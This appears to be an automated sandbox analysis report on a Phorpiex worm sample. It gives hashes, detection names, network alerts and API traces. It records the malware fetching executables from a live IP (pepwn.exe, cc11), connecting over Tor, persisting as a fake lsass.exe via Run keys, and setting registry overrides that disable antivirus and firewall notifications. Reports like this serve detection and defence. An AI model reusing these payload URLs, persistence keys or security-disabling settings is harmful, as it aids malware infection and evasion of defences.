Summary | ZeroBOX

46.exe

Worm Phorpiex PE32 PE File
Category FILE
Machine s1_win7_x6401
Started May 4, 2021, 1:46 p.m.
Completed May 4, 2021, 1:48 p.m.
Size 6.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0a6569e45a3a38f7168f4c4aa0594627
SHA256 ad74f606e358fb7f6db9a5652d0a60310d069ac108934a72d0352e5fa9248b38
CRC32 510E4B74
ssdeep 96:L1YtYF8d/XFvRxR2xs9it95PtboynunSzCt4:L12jWbr5P1oynWSq
PDB Path C b
Yara
  • Win_Worm_Phorpiex - a worm which spreads via removable drives and network drives.
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
api.wipmania.com 212.83.168.196
IP Address Status Action
131.188.40.189 Active Moloch
141.255.162.34 Active Moloch
149.56.45.200 Active Moloch
164.124.101.2 Active Moloch
185.215.113.93 Active Moloch
212.83.168.196 Active Moloch
45.66.156.176 Active Moloch
5.196.71.24 Active Moloch
51.195.253.209 Active Moloch
83.212.103.129 Active Moloch
86.59.21.38 Active Moloch
95.217.42.50 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.215.113.93:80 -> 192.168.56.101:49200 2400023 ET DROP Spamhaus DROP Listed Traffic Inbound group 24 Misc Attack
TCP 192.168.56.101:49207 -> 212.83.168.196:80 2014304 ET POLICY External IP Lookup Attempt To Wipmania Device Retrieving External IP Address Detected
TCP 192.168.56.101:49200 -> 185.215.113.93:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 149.56.45.200:9030 -> 192.168.56.101:49216 2522180 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 181 Misc Attack
TCP 192.168.56.101:49216 -> 149.56.45.200:9030 2002950 ET P2P TOR 1.0 Server Key Retrieval Potential Corporate Privacy Violation
TCP 86.59.21.38:80 -> 192.168.56.101:49212 2522742 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 743 Misc Attack
TCP 45.66.156.176:8443 -> 192.168.56.101:49213 2522577 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 578 Misc Attack
TCP 185.215.113.93:80 -> 192.168.56.101:49200 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49216 -> 149.56.45.200:9030 2221001 SURICATA HTTP gzip decompression failed Generic Protocol Command Decode
TCP 185.215.113.93:80 -> 192.168.56.101:49200 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49212 -> 86.59.21.38:80 2221001 SURICATA HTTP gzip decompression failed Generic Protocol Command Decode
TCP 192.168.56.101:49216 -> 149.56.45.200:9030 2008113 ET P2P Tor Get Server Request Potential Corporate Privacy Violation
TCP 192.168.56.101:49212 -> 86.59.21.38:80 2028914 ET POLICY TOR Consensus Data Requested Potential Corporate Privacy Violation
TCP 149.56.45.200:9030 -> 192.168.56.101:49216 2221001 SURICATA HTTP gzip decompression failed Generic Protocol Command Decode
TCP 86.59.21.38:80 -> 192.168.56.101:49212 2221001 SURICATA HTTP gzip decompression failed Generic Protocol Command Decode
TCP 192.168.56.101:49204 -> 212.83.168.196:80 2014304 ET POLICY External IP Lookup Attempt To Wipmania Device Retrieving External IP Address Detected
TCP 51.195.253.209:9001 -> 192.168.56.101:49218 2522623 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 624 Misc Attack
TCP 192.168.56.101:49218 -> 51.195.253.209:9001 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 5.196.71.24:9001 -> 192.168.56.101:49217 2522640 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 641 Misc Attack
TCP 192.168.56.101:49217 -> 5.196.71.24:9001 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 83.212.103.129:44933 -> 192.168.56.101:49219 2522722 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 723 Misc Attack
TCP 192.168.56.101:49219 -> 83.212.103.129:44933 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 83.212.103.129:44933 -> 192.168.56.101:49219 2018789 ET POLICY TLS possible TOR SSL traffic Misc activity
TCP 131.188.40.189:443 -> 192.168.56.101:49215 2522139 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 140 Misc Attack
TCP 192.168.56.101:49215 -> 131.188.40.189:443 2008113 ET P2P Tor Get Server Request Potential Corporate Privacy Violation

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.101:49219 -> 83.212.103.129:44933 CN=www.ftov32jlnn.com CN=www.4yohmszal2vz7bh.net 49:b6:3f:00:11:f7:04:03:0c:a2:73:1e:c6:30:cd:24:66:bc:62:8e

pdb_path C b
packer Armadillo v1.71
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.93/pepwn.exe
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.93/cc11
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://86.59.21.38/tor/status-vote/current/consensus.z
request GET http://185.215.113.93/pepwn.exe
request GET http://api.wipmania.com/
request GET http://185.215.113.93/cc11
request GET http://86.59.21.38/tor/status-vote/current/consensus.z
description lsass.exe tried to sleep 221 seconds, actually delayed analysis time by 221 seconds
file C:\Users\test22\AppData\Local\Temp\12752.exe
file C:\Users\test22\AppData\Local\Temp\12752.exe
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $ö·¤D—Ù÷D—Ù÷D—Ù÷cQ´÷G—Ù÷cQ¢÷V—Ù÷D—Ø÷ý—Ù÷+ˆÝ÷G—Ù÷Nj×÷F—Ù÷+ˆÓ÷O—Ù÷ZÅ]÷E—Ù÷ZÅH÷E—Ù÷RichD—Ù÷PELQëŽ`à  4Z*BP@àŽ@|vܰ´ÀtSP.textÈ34
request_handle: 0x00cc000c
1 1 0
host 131.188.40.189
host 141.255.162.34
host 149.56.45.200
host 185.215.113.93
host 45.66.156.176
host 5.196.71.24
host 51.195.253.209
host 83.212.103.129
host 86.59.21.38
host 95.217.42.50
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Services reg_value C:\256811963426906\lsass.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Services reg_value C:\256811963426906\lsass.exe
registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
Time & API Arguments Status Return Repeated

connect

ip_address: 5.196.71.24
socket: 1804
port: 9001
1 0 0

send

buffer: ZV`Ò˓… äî—uÇ)m &#Ô2ßáÝ5æ'¹çkV%/5 ÀÀÀ À 28ÿ  
socket: 1804
sent: 95
1 95 0

connect

ip_address: 51.195.253.209
socket: 1800
port: 9001
1 0 0

send

buffer: ZV`Ò Ü+Wb~ þÚÒ£o0Zè#Ibó³x@/5 ÀÀÀ À 28ÿ  
socket: 1800
sent: 95
1 95 0

connect

ip_address: 83.212.103.129
socket: 1804
port: 44933
1 0 0

send

buffer: ZV`Ò ªö‰D¶Ëώ™Ù1Z3Ú`¯Éýq)`mýÓ(/5 ÀÀÀ À 28ÿ  
socket: 1804
sent: 95
1 95 0

send

buffer: FBAq‚–Ф bÂ1z]cûäjªÏÎk½Ù~“}ϙ¾ô ^Ï«y5 ªæڟfb:ë»ñT7¬fZÝa0L!1ðŸj(žûN€KelR*ÓHcq“p_ƒ<.kXn€LÁµ{Ùîn…ß¡
socket: 1804
sent: 134
1 134 0

send

buffer:  tʕ’Ev¸ÈmR Ð솨28EoâPyâdq3€/ÓO
socket: 1804
sent: 37
1 37 0

send

buffer:  ›õ§Yú+{®i“1 ¤B‚£ç»SU Áƒë¥ÖÀ˜è¦äènÒÕu@Ýí,a”ëA0¸ ›´˜È 6¼ÐÔL•„Á:ð¦'Ǚ­‚™ç<0ù¶R @`LöÜ{O‰s,pj+n͕@½ä)ݽÞ1–Ábš¨çŽÕ_,`$»vExBvžJ§´ÐIz[þÐàl«¤h°¢ãICc¦~µòÛäրžwªE0F2W1•ÞÍ+Éã¬À±$×_v3Ä>N†Fø …ü~n¨|‹CÂÛßV} ?'BD¥`Êi¬„Æ?w±Þé6¦Ef««OÁ¢™»­~Ã%1QWà™|sԑ‡¡ÆgZô!+Ú&;:Ña1=˜y3¹±iÑèë˜üÚ). ÐÅZëøÆFgâ=˜Émdnž§Uy{´Ñ!Gp[Jus/”ÙNtFRjÜö/çä-ï~ÛMÊØ¶>OÊóhšUÿœè­Úwô;fzP6[Ñì¶iÐΟÍuYa°°+ہlºÀ¹KðªÉ5<á­¶l6ÌÄ4“òç3tÏÜR½1BÄÙLÆóªö®§!±•‚zô^#ç‘á_¥·n35ãï±R”؏H€úêo®E|>Sh‘zvZÂ䳞Sÿãp%Ûçoÿø¡ÝYa.ooïê!•'&ôXS’}£nI'®ÎLܯÇÌú£I
socket: 1804
sent: 549
1 549 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
process 46.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
process 12752.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
process lsass.exe useragent
file C:\Users\test22\AppData\Local\Temp\12752.exe:Zone.Identifier
file C:\256811963426906\lsass.exe:Zone.Identifier
description attempts to disable antivirus notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
description attempts to disable antivirus notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
description attempts to disable firewall notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
description attempts to disable firewall notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
description attempts to disable windows update notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Heur.Mint.Zard.11
FireEye Generic.mg.0a6569e45a3a38f7
ALYac Gen:Heur.Mint.Zard.11
Cylance Unsafe
K7AntiVirus Trojan ( 0056d4f21 )
K7GW Trojan ( 0056d4f21 )
Cybereason malicious.45a3a3
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Phorpiex.AG
APEX Malicious
Avast Win32:CoinminerX-gen [Trj]
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Heur.Mint.Zard.11
Paloalto generic.ml
Ad-Aware Gen:Heur.Mint.Zard.11
Sophos Mal/Generic-S
Comodo TrojWare.Win32.TrojanDownloader.Agent.EQE@80vxxy
McAfee-GW-Edition BehavesLike.Win32.Generic.xt
Emsisoft Gen:Heur.Mint.Zard.11 (B)
SentinelOne Static AI - Malicious PE
Avira TR/Crypt.XPACK.Gen
MAX malware (ai score=89)
Microsoft Trojan:Win32/Caynamer.A!ml
GData Gen:Heur.Mint.Zard.11
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win32.Dlder.C3467007
Acronis suspicious
McAfee RDN/Generic.hbg
VBA32 BScope.Trojan.Caynamer
Malwarebytes Worm.Phorpiex.Generic
Rising Worm.Phorpiex!8.48D (TFE:dGZlOgUN9lLDNPuMzg)
Ikarus Win32.Outbreak
eGambit Unsafe.AI_Score_97%
Fortinet W32/Phorpiex.AH!worm
BitDefenderTheta Gen:NN.ZexaF.34686.auW@a0A3T4li
AVG Win32:CoinminerX-gen [Trj]
CrowdStrike win/malicious_confidence_100% (W)
dead_host 192.168.56.101:49213
dead_host 45.66.156.176:8443
dead_host 95.217.42.50:1067
dead_host 141.255.162.34:8080